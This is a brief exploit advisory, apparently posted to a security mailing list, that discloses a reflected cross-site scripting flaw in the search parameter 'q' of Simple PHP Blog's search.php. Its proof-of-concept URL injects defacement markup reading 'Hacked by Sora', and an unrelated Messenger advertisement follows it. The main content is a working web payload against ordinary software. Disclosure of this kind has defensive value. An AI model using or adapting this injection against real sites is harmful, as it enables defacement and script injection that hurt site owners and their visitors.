------------------------------------ > Simple PHP Blog Cross Site Scripting Exploit > Author: Sora > Contact: vhr95zw [at] hotmail [dot] com > Website: http://greyhathackers.wordpress.com/ # Vulnerability Description: Simple PHP Blog suffers from a remote cross site scripting exploit in the parameter 'q' of search.php. # Proof of Concept: http://127.0.0.1/blog/search.php?q="><H2>Hacked by Sora</H2> ________________________________ Tell the whole story with photos, right from your Messenger window. Learn how!<http://go.microsoft.com/?linkid=9706112>